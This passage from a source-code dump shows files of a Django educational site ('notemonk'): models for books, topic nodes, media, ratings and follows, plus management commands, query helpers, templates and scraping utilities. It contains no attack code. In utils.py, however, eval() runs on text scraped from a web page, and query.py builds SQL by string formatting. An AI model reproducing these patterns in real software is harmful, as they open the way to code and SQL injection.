notes[0] if notes else None\n \n def user_note(self, user):\n if not user.is_authenticated():\n return\n\n try:\n return self._notes.get(user=user)\n except ObjectDoesNotExist:\n return\n\nclass PrimaryContent(Content, Titled, RateFlag, HasAttachments):\n\n class Meta:\n abstract = True\n\n @property\n def images(self):\n target_type = ContentType.objects.get_for_model(self)\n image_type = ContentType.objects.get_for_model(Image)\n\n media = AssociatedMedia.objects.filter(target_type=target_type,\n target_id=self.id,\n media_type=image_type)\n return media\n\n @property\n def videos(self):\n target_type = ContentType.objects.get_for_model(self)\n video_type = 
ContentType.objects.get_for_model(Video)\n media = AssociatedMedia.objects.filter(target_type=target_type,\n target_id=self.id,\n media_type=video_type)\n return media\n\nclass Book(PrimaryContent, Followable, Tagable, Renderable, Editable):\n TEMPLATE = 'renderables/book.html'\n MODEL_DEFAULT_FLAGS = 'overlay'\n\n user = models.ForeignKey(User, null=False, default=1)\n stream = models.ForeignKey(Stream, unique=True, null=True)\n moderators = models.ManyToManyField(User, related_name='moderator')\n\n file = models.FileField(upload_to='books/%Y/%m/%d')\n cover_image = models.ImageField(upload_to='images/%Y/%m/%d')\n isbn = models.CharField(max_length=255, null=True, blank=True)\n\n @property\n def link(self):\n return '/book/%s/%s/' % (self.id, urlsafe(self.title[:LIMIT]))\n \n @property\n def moderators_link(self):\n return '/book/moderators/%s/' % (self.id)\n \n @property\n def request_moderation_link(self):\n return '/book/request-moderation/%s/' % (self.id)\n \n @property\n def edit_link(self):\n return '/book/edit/%s/' % (self.id)\n\n def _get_book_data(self):\n data = []\n topics = self.node_set.filter(parent=None).order_by('order')\n\n for t in topics:\n data.append(t.get_json(0))\n\n return data\n\n @property\n def outline_json(self):\n data = self._get_book_data()\n return json.dumps(data)\n\n def _prepare_data(self, nodes, parent):\n flat_nodes = []\n\n for index, node in enumerate(nodes):\n _id = node['attributes'].get('id', None)\n _id = int(_id) if _id is not None else None\n node['attributes']['id'] = _id\n\n node['order'] = index\n node['parent'] = parent\n flat_nodes.append(node)\n\n children = node.get('children', [])\n flat_nodes.extend(self._prepare_data(children, node))\n\n return flat_nodes\n\n def _add_nodes(self, nodes):\n for index, node in enumerate(nodes):\n _id = node['attributes']['id']\n\n if _id is None:\n title = node['data']['title']\n order = node['order']\n parent = node['parent']\n if parent is not None:\n p_id = parent['attributes']['id']\n parent = Node.objects.get(id=p_id)\n\n n = Node.objects.create(title=title, book=self,\n parent=parent, order=order)\n node['attributes']['id'] = n.id\n\n children = node.get('children', [])\n self._add_nodes(children)\n\n def _delete_nodes(self, nodes):\n db_nodes = self.node_set.all()\n db_ids = set([n.id for n in db_nodes])\n cur_ids = set([n['attributes']['id'] for n in nodes])\n\n ids = db_ids - cur_ids\n\n for n in db_nodes:\n if n.id in ids:\n n.delete()\n\n def _update_nodes(self, nodes):\n db_nodes = dict([(n.id, n) for n in self.node_set.all()])\n\n for n in nodes:\n parent = n['parent']\n if parent is not None:\n parent = db_nodes[parent['attributes']['id']]\n\n _id = n['attributes']['id']\n db_node = db_nodes[_id]\n db_node.title = n['data']['title']\n db_node.order = n['order']\n db_node.parent = parent\n db_node.save()\n \n def update_json(self, data):\n nodes = json.loads(data)\n if not isinstance(nodes, list):\n nodes = [nodes]\n flat_nodes = self._prepare_data(nodes, None)\n \n self._add_nodes(nodes)\n self._update_nodes(flat_nodes)\n self._delete_nodes(flat_nodes)\n\n def is_editable_by(self, user):\n is_moderator = user in self.moderators.all()\n return Editable.is_editable_by(self, user) or is_moderator\n\nclass Node(PrimaryContent, Editable, Renderable):\n TEMPLATE = 'renderables/node.html'\n\n file = models.FileField(upload_to='nodes/%Y/%m/%d')\n book = models.ForeignKey(Book)\n parent = models.ForeignKey('self', null=True)\n order = models.IntegerField()\n\n class Meta:\n unique_together = 
('title', 'parent', 'order')\n\n    def is_editable_by(self, user):\n        book = get_book(self)\n        book_editable = False\n        if book:\n            book_editable = book.is_editable_by(user)\n        return Editable.is_editable_by(self, user) or book_editable\n\n    @property\n    def link(self):\n        return '/node/%s/%s/' % (self.id, urlsafe(self.title[:LIMIT]))\n\n    @property\n    def target(self):\n        return self.book\n\n    @property\n    def subnodes(self):\n        return Node.objects.filter(parent=self).order_by('order')\n\n    def get_json(self, depth=0):\n        data = {'attributes': {'id': self.id},\n                'data': {\n                    'title': self.title,\n                    'attributes': {'class': 'edit-tree-node'},\n                },\n               }\n        if self.subnodes:\n            data['state'] = 'open'\n            data['children'] = [c.get_json(depth+1) for c in self.subnodes]\n\n        return data\n\n    def __unicode__(self):\n        return '%s under %s' %(self.title, self.parent)\n\n    @property\n    def previous(self):\n        if self.order == 0:\n            return self.parent or self.book\n\n        else:\n            return Node.objects.get(parent=self.parent, book=self.book,\n                                    order=self.order-1)\n\n    @property\n    def next(self):\n\n        node = None\n\n        try:\n            return Node.objects.get(parent=self,\n                                    book=self.book,\n                                    order=0)\n        except ObjectDoesNotExist:\n            pass\n\n        try:\n            return Node.objects.get(parent=self.parent,\n                                    book=self.book,\n                                    order=self.order+1)\n\n        except ObjectDoesNotExist:\n            pass\n\n        if self.parent:\n            p = self.parent\n            porder = p.order\n\n            try:\n                return Node.objects.get(parent=p.parent,\n                                        book=p.book,\n                                        order=porder+1)\n            except ObjectDoesNotExist:\n                pass\n\n    def activity_count(self):\n        '''\n        Number of activities done on this node\n        (notes + questions).\n        '''\n        return len(self.notes) + len(self.questions.all())\n\nclass AssociatedMedia(Content, RateFlag, Renderable):\n    TEMPLATE = 'renderables/video.html'\n    MODEL_DEFAULT_FLAGS = 'overlay'\n\n    user = models.ForeignKey(User)\n\n    target_type = models.ForeignKey(ContentType, related_name=\"target type\")\n    target_id = models.PositiveIntegerField(db_index=True)\n    target = generic.GenericForeignKey('target_type', 'target_id')\n\n    media_type = models.ForeignKey(ContentType, related_name=\"media type\")\n    media_id = models.PositiveIntegerField(db_index=True)\n    media = generic.GenericForeignKey('media_type', 'media_id')\n\n    @classmethod\n    def add(self, user, target, media):\n\n        amedia = self.objects.create(user=user,\n                                     target_type=target.ctype,\n                                     target_id=target.id,\n                                     media_type=media.ctype,\n                                     media_id=media.id)\n        return amedia\n\n    @property\n    def title(self):\n        return self.media.title\n\n    @property\n    def link(self):\n        amedia = 'video' if isinstance(self.media, Video) else 'image'\n        return '/%s/%s/%s/' % (amedia, self.id, urlsafe(self.title[:LIMIT]))\n\n    class Meta:\n        unique_together = ('user', 'target_type', 'target_id', 'media_type', 'media_id')\n        ordering = ('-score',)\n\n    def __unicode__(self):\n        return '%s of %s' % (self.media, self.target)\n\nclass Ratings(Renderable, Referred, GroupRenderer):\n    TEMPLATE = 'renderables/rating.html'\n    GROUP_TEMPLATE = 'renderables/rating_group.html'\n\n    UP = 1\n    DOWN = -1\n\n    user = models.ForeignKey(User)\n    date_added = models.DateTimeField(auto_now_add=True)\n    rating = models.IntegerField()\n\n    target_type = models.ForeignKey(ContentType)\n    target_id = models.PositiveIntegerField(db_index=True)\n    target = generic.GenericForeignKey('target_type', 'target_id')\n\n    @property\n    def verb(self):\n        return 'liked' if self.rating == self.UP else 'disliked'\n\n    @classmethod\n    def render_group(self, context, items):\n\n        # group by user (groupby needs its input sorted on the grouping key)\n        items.sort(key=lambda x: x.target.user.username)\n        groups = groupby(items, lambda x: x.target.user)\n        
groups = [(k, list(citems)) for k, citems in groups]\n\n subgrouped = []\n for user, activities in groups:\n\n # group by rating\n activities.sort(key=lambda x: x.target.rating)\n activities = groupby(activities, lambda x: x.target.rating)\n activities = dict([(k, list(citems)) for k, citems in activities])\n\n subgroup = {'liked': activities.get(Ratings.UP, []),\n 'disliked': activities.get(Ratings.DOWN, [])}\n\n for rating, activities in subgroup.iteritems():\n # group by object type\n activities.sort(key=lambda x: x.target.target.__class__.__name__)\n activities = groupby(activities, lambda x: x.target.target.__class__.__name__)\n activities = dict([(k, list(citems)) for k, citems in activities])\n\n subgroup[rating] = activities\n\n if not subgroup['liked']:\n del subgroup['liked']\n \n if not subgroup['disliked']:\n del subgroup['disliked']\n\n subgrouped.append((user, subgroup))\n\n t = template.loader.get_template(self.GROUP_TEMPLATE)\n c = make_context(context)\n c['groups'] = subgrouped\n c['activities'] = items\n return t.render(c)\n\n class Meta:\n unique_together = ('user', 'target_id', 'target_type')\n\n def __unicode__(self):\n return '%s rated for %s' % (self.user, self.target)\n\nclass Follows(Renderable, Referred):\n TEMPLATE = 'renderables/follow.html'\n\n user = models.ForeignKey(User)\n date_added = models.DateTimeField(auto_now_add=True)\n\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n @property\n def verb(self):\n return 'is now following'\n\n class Meta:\n unique_together = ('user', 'target_id', 'target_type')\n\n def __unicode__(self):\n return '%s for %s' % (self.user, self.target)\n\nclass Flags(Renderable, Referred):\n TEMPLATE = 'renderables/flag.html'\n\n user = models.ForeignKey(User)\n date_added = models.DateTimeField(auto_now_add=True)\n\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n @property\n def verb(self):\n return 'flagged'\n\n class Meta:\n unique_together = ('user', 'target_id', 'target_type')\n\n def __unicode__(self):\n return '%s for %s' % (self.user, self.target)\n\nclass Video(Referred, Titled, Renderable):\n user = models.ForeignKey(User)\n date_added = models.DateTimeField(auto_now_add=True)\n source = models.CharField(max_length=100)\n source_id = models.CharField(max_length=200)\n\n def render(self, *args, **kwargs):\n return ''\n\n class Meta:\n unique_together = ('source', 'source_id')\n\n def __unicode__(self):\n return '%s for %s' %(self.source_id, self.title)\n \nclass Image(Referred, Titled):\n file = models.ImageField(upload_to='images/%Y/%m/%d')\n url_hash = models.CharField(max_length=32)\n url = models.TextField(max_length=2000)\n page_url = models.TextField(max_length=2000, blank=True, null=True)\n user = models.ForeignKey(User)\n\n class Meta:\n unique_together = ('url_hash',)\n \n def __unicode__(self):\n return '%s for %s' %(self.url, self.title)\n\n def save(self, *args, **kwargs):\n self.url_hash = hashlib.md5(self.url).hexdigest()\n super(Image, self).save(*args, **kwargs)\n\n @property\n def link(self):\n return '/image/%s/%s/' % (self.id, urlsafe(self.title[:LIMIT]))\n"
},
{
"alpha_fraction": 0.7541436553001404,
"alphanum_fraction": 0.7541436553001404,
"avg_line_length": 39.22222137451172,
"blob_id": "d0ea65d80d9e75fe1e4ed6b9019a49f84c725def",
"content_id": "2a3ca7fe1c811f7ba3cd44970c08820c44806a3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 362,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 9,
"path": "/www/core/admin.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom core.models import *\n\nfor model_klass in (Category, LeaderBoardData, Question, Answer,\\\n FBUserProfile, UserProfile, PointsHistory, Note, Book,\\\n Node, AssociatedMedia, Ratings, Follows, Video, Image, Tag, TagItem,\n RedeemableItem, RedemptionItem, Redemption, Attachment):\n \n admin.site.register(model_klass)\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.6302631497383118,
"avg_line_length": 35.19047546386719,
"blob_id": "14964faf0d7f8fe548c45aa13c69ae6294b0cffd",
"content_id": "52bd24c7f9d539c738fcc9ff8d710c6749976dee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 760,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 21,
"path": "/www/core/management/commands/process_onliners.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import datetime\nfrom django.core.management.base import BaseCommand\nfrom core.models import *\n\nclass Command(BaseCommand):\n help = 'Find who are online in last one hour and update in Onliners Table.'\n args = ''\n\n def handle(self, *args, **options):\n one_hour_ago = datetime.datetime.now() - datetime.timedelta(hours=5)\n sql_datetime = datetime.datetime.strftime(one_hour_ago, '%Y-%m-%d %H:%M:%S')\n online_users = User.objects.filter(last_login__gt=sql_datetime,\n is_active__exact=1).order_by('-last_login')[:10]\n \n Onliners.objects.all().delete()\n\n for onliner in online_users:\n Onliners.objects.create(user = onliner)\n\n def usage(self, subcommand):\n return ''\n"
},
{
"alpha_fraction": 0.6160221099853516,
"alphanum_fraction": 0.6187845468521118,
"avg_line_length": 21.625,
"blob_id": "a14e4a0dd8bbafc4071983396957e192045f4fe0",
"content_id": "da1f45a075e1693b4f6dee98a8f9121a11120c86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 362,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 16,
"path": "/www/scripts/load_tags.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom core.models import Tag\nfrom django.db import IntegrityError\n\ndef main(tags_fname):\n Tag.objects.all().delete()\n\n tags = set([t.strip() for t in open(tags_fname)\\\n if t.strip() and not t.strip().startswith('#')])\n\n for tag in tags:\n Tag.objects.create(name=tag)\n\nif __name__ == '__main__':\n main(sys.argv[1])\n"
},
{
"alpha_fraction": 0.6081720590591431,
"alphanum_fraction": 0.6094623804092407,
"avg_line_length": 29.194805145263672,
"blob_id": "b5c0e94091789c6eb58bb7e5baba962f45d5d3f8",
"content_id": "a80fbf54fa20af8cf8e49b165998c47d7d91dd2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2325,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 77,
"path": "/www/core/query.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.db import IntegrityError\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import connection\n\nfrom core.models import *\nfrom core.utils import get_gimages, get_ytvideos\nfrom core.utils import log, xcode\n\ndef get_top_users(limit=20):\n #return UserProfile.objects.filter(user__is_staff=False).order_by('-points')[:limit]\n toppers = Toppers.objects.order_by('id')\n return [t.user_profile for t in toppers]\n\ndef load_images(node, user):\n log.debug('load_images: %s, %s' % (node, user))\n\n images = get_gimages(xcode(node.title, mode='ignore'))\n I = Image.objects\n\n for title, url in images:\n try:\n image = I.create(title=title, url=url, user=user)\n except IntegrityError:\n image = I.get(url=url)\n\n try:\n aimage = AssociatedMedia.add(user, node, image)\n except IntegrityError:\n pass\n\ndef load_videos(node, user):\n title = xcode(node.title, mode='ignore')\n videos = get_ytvideos(title)\n\n V = Video.objects\n\n for title, yt_id in videos:\n\n log.debug('Adding video: %s, %s ...' % (yt_id, title))\n\n try:\n video = V.create(source='youtube', source_id=yt_id,\n user=user, title=title)\n except IntegrityError:\n log.debug('Video exists already')\n video = V.get(source='youtube', source_id=yt_id)\n\n try:\n avideo = AssociatedMedia.add(user, node, video)\n except IntegrityError:\n pass\n\ndef get_items_by_tag(model, tags, query_type='all'):\n item_type = ContentType.objects.get_for_model(model).id\n\n tags = [str(t.id) for t in Tag.objects.filter(name__in=tags)]\n if not tags:\n return model.objects.none()\n\n query = '''SELECT item_id FROM core_tagitem\n WHERE item_type_id = %s AND tag_id IN (%s)\n GROUP BY item_id '''\n\n if query_type == 'all':\n query = query + 'HAVING COUNT(item_id) = %s'\n params = (item_type, ','.join(tags), len(tags))\n\n else:\n params = (item_type, ','.join(tags))\n\n query = query % params\n cursor = connection.cursor()\n cursor.execute(query)\n\n item_ids = [row[0] for row in cursor.fetchall()]\n objs = model.objects\n return objs.filter(id__in=item_ids) if item_ids else objs.none()\n"
},
{
"alpha_fraction": 0.4414498209953308,
"alphanum_fraction": 0.45260223746299744,
"avg_line_length": 26.564102172851562,
"blob_id": "8acee49736127103ffca5c9da1dde6c94ad1e1d2",
"content_id": "334c403b3cd5bcd52430d47e75233b719b7641ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1076,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 39,
"path": "/www/core/templates/renderables/group_base.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "\n{% load filters %}\n{% load tags %}\n\n{% block digest %}\n{% endblock %}\n\n{% block activities %}\n \n <div class=\"group-expand\">\n\t<a href=\"#\" style=\"\" id=\"ag_see_{{ activities.0.id }}\">expand</a>\n </div>\n\n <div class=\"grid_11 alpha omega\">\n\n <div id=\"ag_{{ activities.0.id }}\" class=\"expanded-group roundedges\">\n \n {% for a in activities %}\n {% render a 'image,more,-flag,-addedby,context' %}\n\n {% if not forloop.last %}\n\t\t<div class=\"grid_11 alpha hrdiv\"></div>\n <div class=\"grid_11 alpha\"><br/></div>\n {% else %}\n\t\t<div class=\"group-collapse\"> \n <a href=\"#\" id=\"ag_hide_{{ activities.0.id }}\">collapse</a>\n </div>\t\n\t\t{% endif %}\n {% endfor %}\n \n\t </div>\n\n <script>\n $(document).ready(function(){\n setup_showhide('#ag_see_{{ activities.0.id }}', '#ag_hide_{{ activities.0.id }}', '#ag_{{ activities.0.id }}');\n })\n </script>\n\n </div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.6206896305084229,
"alphanum_fraction": 0.6206896305084229,
"avg_line_length": 42.5,
"blob_id": "bba0e3f03fc77ceeb381907f547cc62dfeed0bac",
"content_id": "cf7b2009d045b5c11f018a772559d901d564f52b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 174,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 4,
"path": "/www/core/templates/renderables/flag.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "{% load tags %}\n\n<a class=\"username\" href=\"{{ obj.user.get_profile.link }}\">{{ obj.user.get_profile.title }}</a> flagged {% render obj.target %}<br/>\n{{ obj.date_added|dt }}\n"
},
{
"alpha_fraction": 0.6214318871498108,
"alphanum_fraction": 0.6214318871498108,
"avg_line_length": 60.05714416503906,
"blob_id": "ac3ff310e5f0761bcea11c4749da7dc4d4acb38c",
"content_id": "4f4991f7392fac7aef23f58d42cca69c0f705aaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2137,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 35,
"path": "/www/core/management/commands/create_notifications.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.core.management.base import BaseCommand\nfrom django.utils.translation import ugettext_noop as _\nfrom notification import models as notification\n\nclass Command(BaseCommand):\n help = 'Creates notification types. Run once at installation time.'\n args = ''\n\n def handle(self, *args, **options):\n create = notification.create_notice_type\n create('question_add', _('Question Added'), _('A new question has been added'))\n create('question_rated', _('Question Rated'), _('Question has been rated'))\n create('answer_add', _('Answer Added'), _('A new answer has been added'))\n create('answer_rated', _('Answer Rated'), _('Answer has been rated'))\n create('video_add', _('Video Added'), _('A new video has been added'))\n create('video_rated', _('Video Rated'), _('Video has been rated'))\n create('note_add', _('Notes Added'), _('Notes has been added'))\n create('note_rated', _('Note Rated'), _('Note has been rated'))\n create('note_changed', _('Note Changed'), _('Note has been changed'))\n create('profile_changed', _('Profile Changed'), _('Profile has been changed'))\n create('profile_rated', _('Profile Rated'), _('Profile has been rated'))\n create('book_rated', _('Book Rated'), _('Book has been rated'))\n create('node_rated', _('Topic Rated'), _('Topic has been rated'))\n create('user_level_changed', _('Level Changed'), _('Level has changed'))\n create('book_mod_request', _('Book Mod Requested'), _('A user has requested permissions to moderate book'))\n create('credits_earned', _('Credits Earned'), _('You have earned credits'))\n create('user_redeemed', _('User Redeemed'), _('User has redeemed credits'))\n create('comment_add', _('Commented'), _('A new comment has been added'))\n create('ppost_add', _('New Profile Post'), _('A new post has been made on a profile'))\n\n create('_user_joined', _('User Joined'), _('A new user has been joined'))\n create('_user_feedback', _('User Feedback'), _('Feedback from user'))\n\n def usage(self, subcommand):\n return ''\n"
},
{
"alpha_fraction": 0.5617855191230774,
"alphanum_fraction": 0.5733079314231873,
"avg_line_length": 27.117347717285156,
"blob_id": "a7ce475a7cd42849724edc75452b1737f73d7763",
"content_id": "738e3633fb4059cc32896cb6e3796948e158eee1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11022,
"license_type": "no_license",
"max_line_length": 535,
"num_lines": 392,
"path": "/www/core/utils.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import os\nimport re\nimport hashlib\nimport random\nimport urllib\nimport urllib2\nimport socket\nimport logging\nfrom itertools import chain, islice\n\nimport feedparser\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils.html import strip_tags\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.template import Context\nfrom django.db.models.query import QuerySet\nfrom django.core.mail.backends.smtp import EmailBackend as SMTPEmailBackend\nimport django.core.mail as mail\n\nsocket.setdefaulttimeout(10)\nlog = logging.getLogger()\nDEFAULT_USERAGENT = 'Mozilla/5.001 (windows; U; NT4.0; en-US; rv:1.0) Gecko/25250101'\n\nHANDLING_CREDITS = 0\n\ndef xcode(string, encoding='utf8', mode='strict'):\n try:\n if isinstance(string, unicode):\n string = string.encode(encoding, mode)\n else:\n string = string.decode(encoding, mode)\n except:\n string = None\n\n return string\n\ndef urlsafe(string):\n string = xcode(string, 'ascii', 'ignore')\n string = string.replace('%', '')\n string = string.replace(' ', '.')\n string = string.replace('\\'', '')\n string = string.replace('\"', '')\n string = string.replace('?', '')\n return string\n\ndef get_doc(url, cache=None, user_agent=None):\n\n cache_id = hashlib.md5(url).hexdigest()\n data = None\n user_agent = user_agent or DEFAULT_USERAGENT\n\n if cache and isinstance(cache, (str, unicode)):\n cache = DirectoryCache(cache)\n\n request = urllib2.Request(url)\n request.add_header('User-Agent', user_agent)\n opener = urllib2.build_opener()\n\n if cache:\n data = cache.get(cache_id)\n \n if not data:\n data = opener.open(request).read()\n\n if cache:\n cache.set(cache_id, data)\n\n return data\n\nclass Cache:\n '''\n Represents a crawl cache\n '''\n def __init__(self):\n raise NotImplemented\n\n def get(self, id):\n '''\n Get data for specified id from cache\n @id (str)\n '''\n raise NotImplemented\n\n def set(self, id, data):\n '''\n Set data for specified id in cache\n @id (str)\n @data (str)\n '''\n raise NotImplemented\n\nclass DirectoryCache(Cache):\n '''\n A file system directory cache\n '''\n def __init__(self, cache_dir):\n '''\n @cache_dir (str) - location to store cache files / read from\n '''\n self.cache_dir = cache_dir\n if not os.path.exists(cache_dir):\n raise Exception('Cache dir : %s not present' % cache_dir)\n\n def get_path(self, id):\n hash = hashlib.md5(id).hexdigest()\n dir_one = hash[:2]\n dir_two = hash[2:4]\n\n path = os.path.join(self.cache_dir, dir_one, dir_two)\n if not os.path.exists(path): os.makedirs(path)\n\n fpath = os.path.join(path, id)\n return fpath\n\n def get(self, id):\n path = self.get_path(id)\n data = None\n if os.path.exists(path):\n data = open(path).read()\n return data\n\n def set(self, id, data):\n path = self.get_path(id)\n assert(isinstance(data, str))\n open(path, 'w').write(data)\n\ndef _get_image_links(data):\n images = []\n\n data = re.findall('dyn.setResults\\((.*?)\\);</script>', data)[0]\n data = data[1:-1]\n data = eval(data)\n\n for item in data:\n #['/imgres?imgurl=http://musicalstewdaily.files.wordpress.com/2009/02/broken_heart_by_starry_eyedkid-1.jpg&imgrefurl=http://nappybrain.wordpress.com/&usg=__-DklieMA2JoqK37viOcmLC65k58=&h=872&w=947&sz=551&hl=en&start=21&itbs=1', '', 'M-QmlkObDYlaYM:', 'http://musicalstewdaily.files.wordpress.com/2009/02/broken_heart_by_starry_eyedkid-1.jpg', '148', '136', 'You broke my <b>heart</b> last night', '', '', '947 x 872 - 551k', 'jpg', 'nappybrain.wordpress.com', '', '', 
'http://t2.gstatic.com/images', '1', [], '', 1, '', [], '']\n        url = item[3]\n        title = strip_tags(item[6])\n        images.append([title, url])\n\n    return images\n\ndef _get_image_links1(data):\n    images = []\n    _images = re.findall('imgurl=.*? height=', data)\n\n    for i in _images:\n        imglink = re.findall('imgurl=(.*?)&imgrefurl', i)[0]\n        thumblink = re.findall('<img src=(.*):http', i)[0]\n        images.append(['', imglink])\n\n    return images\n\ndef get_gimages(sstring):\n    log.debug('get_gimages: %s' % sstring)\n\n    sstring = urllib.quote_plus(sstring)\n    url = 'http://images.google.com/images?as_st=y&gbv=2&hl=en&'\\\n          'safe=active&tbo=1&sa=1&q=%s&aq=f&oq=&aqi=&start=0' % sstring\n    data = get_doc(url, settings.CACHE_DIR, DEFAULT_USERAGENT)\n\n    images = _get_image_links(data)\n    if not images:\n        images = _get_image_links1(data)\n\n    return images\n\ndef get_ytvideos(sstring):\n    log.debug('get_ytvideos: %s' % sstring)\n\n    url = 'http://gdata.youtube.com/feeds/api/videos?orderby=relevance'\\\n          '&start-index=1&max-results=20&v=2&safeSearch=strict&q=%s'\n    url = url % urllib.quote_plus(sstring)\n\n    data = get_doc(url, settings.CACHE_DIR)\n    feed = feedparser.parse(data)\n\n    videos = []\n    for e in feed.entries:\n        title = e.title\n\n        # FIXME: Some titles are being screwed by feedparser\n        if not isinstance(title, unicode):\n            try:\n                title = title.decode('utf8')\n            except:\n                continue\n\n        # Sometimes the field of video id is different\n        video_id = getattr(e, 'yt_videoid', None) or getattr(e, 'videoid', None)\n        if not video_id:\n            continue\n\n        videos.append((title, video_id))\n\n    log.debug('found %d videos' % len(videos))\n    return videos\n\ndef get_target(target_type, target):\n    target_type = ContentType.objects.get(id=int(target_type))\n\n    try:\n        target = target_type.get_object_for_this_type(id=int(target))\n    except ObjectDoesNotExist:\n        target = None\n\n    return target\n\ndef get_target_from_req(req):\n    target_type = req.POST['target_type']\n    target = req.POST['target']\n\n    return get_target(target_type, target)\n\ndef sanitize_whitespace(text):\n    text = re.sub('\\t+', ' ', text)\n    text = re.sub('\\n+', '\\n', text)\n    text = re.sub(' +', ' ', text)\n    return text\n\ndef make_context(context):\n    c = Context()\n    keys = list(set(chain(*[d.keys() for d in context.dicts])))\n\n    for k in keys:\n        c[k] = context[k]\n\n    return c\n\ndef parse_flags(flags):\n    if not flags:\n        return {}\n\n    flags = [x.strip() for x in flags.split(',') if x.strip()]\n    flags = [('is_' + x.split('-')[-1] if x.startswith('-') else 'is_' + x,\n              not x.startswith('-')) for x in flags]\n    flags = dict(flags)\n    return flags\n\nclass QuerySetFilter(QuerySet):\n    '''\n    Filters a queryset and transforms the returned items\n    using a user specified function. 
The fn is applied\n    to every item and its return value is returned.\n\n    If the fn returns None for a certain item, then that\n    is filtered from the queryset\n    '''\n\n    def __init__(self, object_list, fn=lambda x: x):\n        self.object_list = object_list\n        self.fn = fn\n\n    def __len__(self):\n        return self.count()\n\n    def count(self):\n        return self.object_list.count()\n\n    def __wrap_iter(self, iterator):\n        for x in iterator:\n            x = self.fn(x)\n            if x is not None:\n                yield x\n\n    def __iter__(self):\n        return self.__wrap_iter(iter(self.object_list))\n\n    def __nonzero__(self):\n        return self.object_list.__nonzero__()\n\n    def all(self):\n        return QuerySetFilter(self.object_list.all(), self.fn)\n\n    def __getitem__(self, k):\n\n        if k == 'count':\n            return self.count()\n\n        elif isinstance(k, slice):\n            start, stop, step = k.indices(self.object_list.count())\n\n            all = iter(self)\n            items = []\n\n            while len(items) < (stop - start):\n                try:\n                    items.append(all.next())\n                except StopIteration:\n                    break\n\n            return items\n\n        elif isinstance(k, int):\n            return self.fn(self.object_list.__getitem__(k))\n\nclass QuerySetMerge(QuerySet):\n    def __init__(self, querysets, key='-date_added'):\n        self.querysets = querysets\n        if key.startswith('-'):\n            self.ascending = False\n            self.key = key[1:]\n        else:\n            self.ascending = True\n            self.key = key\n\n    def xmerge(self, ln, ascending=True):\n        \"\"\" Iterator version of merge.\n\n        Assuming l1, l2, l3...ln sorted sequences, return an iterator that\n        yields all the items of l1, l2, l3...ln in ascending order.\n        Input values don't need to be lists: any iterable sequence can be used.\n        \"\"\"\n        # Adapted from: http://code.activestate.com/recipes/141934-merging-sorted-sequences/\n\n        pqueue = []\n        for i in map(iter, ln):\n            try:\n                pqueue.append((i.next(), i.next))\n            except StopIteration:\n                pass\n        pqueue.sort()\n        if ascending:\n            pqueue.reverse()\n        X = max(0, len(pqueue) - 1)\n        while X:\n            d,f = pqueue.pop()\n            yield d\n            try:\n                # Insort in reverse order to avoid pop(0)\n                pqueue.append((f(), f))\n                pqueue.sort()\n                if ascending:\n                    pqueue.reverse()\n            except StopIteration:\n                X -= 1\n        if pqueue:\n            d,f = pqueue[0]\n            yield d\n            try:\n                while 1: yield f()\n            except StopIteration:\n                pass\n\n    def __len__(self):\n        return self.count()\n\n    def count(self):\n        return sum(q.count() for q in self.querysets)\n\n    def __iter__(self):\n        qsets = [((getattr(x, self.key), x) for x in q) for q in self.querysets]\n        merged = self.xmerge(qsets, self.ascending)\n        return (x for k, x in merged)\n\n    def __nonzero__(self):\n        return self.count() != 0\n\n    def all(self):\n        return self\n\n    def __getitem__(self, k):\n        if k == 'count':\n            return self.count()\n\n        elif isinstance(k, slice):\n            start, stop, step = k.indices(self.count())\n            return islice(iter(self), start, stop, step)\n\nclass RoundRobinEmailBackend(SMTPEmailBackend):\n    def __init__(self, *args, **kwargs):\n        super(RoundRobinEmailBackend, self).__init__(*args, **kwargs)\n        self.username = random.choice(settings.RR_EMAIL_USERS)\n\ndef get_md5(f):\n    md5 = hashlib.md5()\n    while True:\n        chunk = f.read(128)\n        if not chunk:\n            break\n        md5.update(chunk)\n    return md5.hexdigest()\n\nclass StripCookieMiddleware(object):\n    \"\"\"Ganked from http://2ze.us/Io\"\"\"\n\n    STRIP_RE = re.compile(r'\\b(_[^=]+=.+?(?:; |$))')\n\n    def process_request(self, request):\n        cookie = self.STRIP_RE.sub('', request.META.get('HTTP_COOKIE', ''))\n        